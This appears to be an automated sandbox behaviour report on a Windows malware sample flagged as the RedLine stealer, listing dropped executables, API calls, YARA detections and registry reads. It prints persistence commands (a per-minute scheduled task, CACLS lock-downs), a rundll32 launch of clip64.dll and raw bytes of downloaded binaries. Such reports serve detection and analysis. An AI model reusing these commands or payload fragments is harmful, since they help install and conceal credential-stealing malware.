file C:\Users\test22\AppData\Local\Temp\IXP006.TMP\m1118777.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\f5626788.exe
file C:\Users\test22\AppData\Local\Temp\IXP007.TMP\l2919722.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\g7297858.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\b0495250.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c6805445.exe
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c3912af058" /P "test22:N"&&CACLS "..\c3912af058" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
file C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
file C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
file C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
file C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
file C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\i6821669.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\x1404399.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c3912af058" /P "test22:N"&&CACLS "..\c3912af058" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $×â%‡“ƒKԓƒKԓƒKÔöåNՒƒKÔöåHՒƒKÔöåOՇƒKÔöåJՂƒKԓƒJÔ ƒKÔöåC՚ƒKÔöå´Ô’ƒKÔöåIՒƒKÔRich“ƒKÔPELâ`bà  d†`j€@ @µÅ@Á Œ¢´À¬g0ˆT@ ˆ.textcd `.dataH€h@À.idataR j@@.rsrcpÀh|@@.relocˆ0 ä@B‚@P‚@¤€@p@ˆ¢@È@u j@°i@@o@àÀ012P4ð4B€IPJÐJ`KÀK LÀLÐLàO€cÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32*...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øœœâ`bprRSDSºÍã÷æÎÍú1‚ òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat .rdata$zzzdbg€8\.text$mn¸r\.xdata$x€à.dataàh.bss ˆ.idata$5ˆ¢.00cfgŒ¢ .idata$2,£.idata$3@£ˆ.idata$4È¥Š .idata$6À.rsrc$01Ä ‰.rsrc$02‹ÿU‹ì3À…Òtúÿÿÿv¸W€…Àx QÿuQèÛë…ÒtÆ]‹ÿU‹ìSVW3ÿ»W€‹÷…Òtúÿÿÿv‹ó…öx?‹ò‹Á…Òt €8t@ƒîuõ‹þ‹Â÷Þö+ǁæ©ÿøó÷ßÿ#ø…öxQÿu+×QÏèn‹ð_‹Æ^[]‹ÿU‹ì‹E V3ö…Àt=ÿÿÿv¾W€…öx5S‹]3öWxÿEPÿuWSÿ|¢@ƒÄ…Àx;Çwu ë¾z€Æ_[ë …Àt‹MÆ‹Æ^]ËÿU‹ì…Òt&‹E SV¾þÿÿ+Á…ötŠ„Ût ˆANƒêuì^[…ÒuI÷ÚÆҁâ†ÿø‚z€] ‹ÿU‹ì9Mr‹Eº+Á;Âw+M ë3À]‹ÿU‹ìƒì¡€@3ʼnEüSVW3ÀfÇEø‹ñ‰EôhD@‰uè‹Øÿx @‹ø…ÿtjhT@Wÿœ @‰Eð…ÀtP3ɍEìPQQQQQQh j jEô‰PCÿ$ @…Àt*‹Mð‹ôÿuèÿuìjÿˆ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @‹Mü‹Ã_^3Í[èAT‹å]ËÿU‹ìƒì¡€@3ʼnEü¡(@SWj3ÛfÇEø_‰]ô‰]ð;Ç…ôMðèÿÿÿ…À…ӍEèPjÿ¡@Pÿ @…À„ɍEìPSSWÿuèÿ @…À…’ÿl @ƒøz…ƒVÿuìSÿP¡@‹ð…ötqEìPÿuìVWÿuèÿ @…ÀtTEäPSSSSSSh j WEôPÿ$ @…Àt49v'~ÿuäÿ7ÿ, @…Àu CƒÇ;réë 3À@£(@‰Eðÿuäÿ @Vÿ¤ @^ÿuèÿˆ @‹Eðë‹Eð…Àt Ç(@‹Mü_3Í[è S‹å]ÃÌÌÌÌÌÌ̋ÿU‹ìì¡€@3ʼnEü‹E V‹u-t!ƒèu‹UŠÃ÷ÿÿƒùw RVÿà¡@ëP3ÀëOÿÌ¡@‹Ð‹Îè)h…üýÿÿƅüýÿÿPÿuÿ5<š@ÿè¡@…üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@‹Mü3Í^èbR‹å]‹ÿU‹ìQS‹Á‹ÚVW‰Eü3ÿ‹0ë€>tFf¾‹ËèÔK…Àuë‹Eüf¾‰0ë3Àë#€<7tGf¾7‹Ëè®K…Àté7€8tÆ@_^[‹å]ËÿU‹ìì¡€@3ʼnEü‹EºSV‹Ù‰…èùÿÿ‹E ôýÿÿWS‰…ìùÿÿè[ûÿÿ€½ôýÿÿ"u ºl@…õýÿÿë ºp@…ôýÿÿðùÿÿ‰…ðùÿÿè-ÿÿÿ‹µðùÿÿ‹ø…öt<‹ÎQŠA„Àuù+ʃùr)ŠF<:u€~\t €>\u<\uVºøþÿÿèãúÿÿë(Qhä‘@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.Z‹Îè÷J…À„šjÿht@jÿPjjÿh @Hƒè…|…øþÿÿPÿ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $×â%‡“ƒKԓƒKԓƒKÔöåNՒƒKÔöåHՒƒKÔöåOՇƒKÔöåJՂƒKԓƒJÔ ƒKÔöåC՚ƒKÔöå´Ô’ƒKÔöåIՒƒKÔRich“ƒKÔPELâ`bà  dˆ`j€@ @’Q@Á Œ¢´À`i0ˆT@ ˆ.textcd `.dataH€h@À.idataR j@@.rsrcpÀj|@@.relocˆ0 æ@B‚@P‚@¤€@p@ˆ¢@È@u j@°i@@o@àÀ012P4ð4B€IPJÐJ`KÀK LÀLÐLàO€cÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32*...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øœœâ`bprRSDSºÍã÷æÎÍú1‚ òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat .rdata$zzzdbg€8\.text$mn¸r\.xdata$x€à.dataàh.bss ˆ.idata$5ˆ¢.00cfgŒ¢ .idata$2,£.idata$3@£ˆ.idata$4È¥Š .idata$6À.rsrc$01Ä ‰.rsrc$02‹ÿU‹ì3À…Òtúÿÿÿv¸W€…Àx QÿuQèÛë…ÒtÆ]‹ÿU‹ìSVW3ÿ»W€‹÷…Òtúÿÿÿv‹ó…öx?‹ò‹Á…Òt €8t@ƒîuõ‹þ‹Â÷Þö+ǁæ©ÿøó÷ßÿ#ø…öxQÿu+×QÏèn‹ð_‹Æ^[]‹ÿU‹ì‹E V3ö…Àt=ÿÿÿv¾W€…öx5S‹]3öWxÿEPÿuWSÿ|¢@ƒÄ…Àx;Çwu ë¾z€Æ_[ë …Àt‹MÆ‹Æ^]ËÿU‹ì…Òt&‹E SV¾þÿÿ+Á…ötŠ„Ût ˆANƒêuì^[…ÒuI÷ÚÆҁâ†ÿø‚z€] ‹ÿU‹ì9Mr‹Eº+Á;Âw+M ë3À]‹ÿU‹ìƒì¡€@3ʼnEüSVW3ÀfÇEø‹ñ‰EôhD@‰uè‹Øÿx @‹ø…ÿtjhT@Wÿœ @‰Eð…ÀtP3ɍEìPQQQQQQh j jEô‰PCÿ$ @…Àt*‹Mð‹ôÿuèÿuìjÿˆ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @‹Mü‹Ã_^3Í[èAT‹å]ËÿU‹ìƒì¡€@3ʼnEü¡(@SWj3ÛfÇEø_‰]ô‰]ð;Ç…ôMðèÿÿÿ…À…ӍEèPjÿ¡@Pÿ @…À„ɍEìPSSWÿuèÿ @…À…’ÿl @ƒøz…ƒVÿuìSÿP¡@‹ð…ötqEìPÿuìVWÿuèÿ @…ÀtTEäPSSSSSSh j WEôPÿ$ @…Àt49v'~ÿuäÿ7ÿ, @…Àu CƒÇ;réë 3À@£(@‰Eðÿuäÿ @Vÿ¤ @^ÿuèÿˆ @‹Eðë‹Eð…Àt Ç(@‹Mü_3Í[è S‹å]ÃÌÌÌÌÌÌ̋ÿU‹ìì¡€@3ʼnEü‹E V‹u-t!ƒèu‹UŠÃ÷ÿÿƒùw RVÿà¡@ëP3ÀëOÿÌ¡@‹Ð‹Îè)h…üýÿÿƅüýÿÿPÿuÿ5<š@ÿè¡@…üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@‹Mü3Í^èbR‹å]‹ÿU‹ìQS‹Á‹ÚVW‰Eü3ÿ‹0ë€>tFf¾‹ËèÔK…Àuë‹Eüf¾‰0ë3Àë#€<7tGf¾7‹Ëè®K…Àté7€8tÆ@_^[‹å]ËÿU‹ìì¡€@3ʼnEü‹EºSV‹Ù‰…èùÿÿ‹E ôýÿÿWS‰…ìùÿÿè[ûÿÿ€½ôýÿÿ"u ºl@…õýÿÿë ºp@…ôýÿÿðùÿÿ‰…ðùÿÿè-ÿÿÿ‹µðùÿÿ‹ø…öt<‹ÎQŠA„Àuù+ʃùr)ŠF<:u€~\t €>\u<\uVºøþÿÿèãúÿÿë(Qhä‘@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.Z‹Îè÷J…À„šjÿht@jÿPjjÿh @Hƒè…|…øþÿÿPÿ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL>Qdà! ތ>ð°@ Jœ<K<€øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌj8hÌ<¹ˆhè#h`êèl*YÃÌÌÌj8hÌ<¹ hèÿ"hÀêèL*YÃÌÌÌj8hÌ<¹¸hèß"h ëè,*YÃÌÌÌj8h=¹Ðhè¿"h€ëè *YÃÌÌÌj0hD=¹èhèŸ"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌh€h°=¹iè\"h ìè©)YÃj?h€>¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhˆJEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾Š8>‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÀ>ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C €ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hÄ>MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00116400', u'virtual_address': u'0x0000c000', u'entropy': 7.965348267589257, u'name': u'.rsrc', u'virtual_size': u'0x00117000'} entropy 7.96534826759 description A section with a high entropy has been found
entropy 0.971628109996 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communications smtp rule Network_SMTP_dotNet
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications smtp rule Network_SMTP_dotNet
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description RedLine stealer rule RedLine_Stealer_m_Zero
description Communications smtp rule Network_SMTP_dotNet
description PWS Memory rule Generic_PWS_Memory_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications smtp rule Network_SMTP_dotNet
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x000003a4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: AddressBook
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: Connection Manager
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: DirectDrawEx
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: EditPlus
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: ENTERPRISE
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

 regkey_r: Fontcore
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: Google Chrome
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: Haansoft HWord 80 Korean
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: IE40
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: IE4Data
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

 regkey_r: IE5BAKEX
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

 regkey_r: IEData
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

 regkey_r: MobileOptionPack
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

 regkey_r: SchedulingAgent
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

 regkey_r: WIC
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

 regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

 regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

 regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

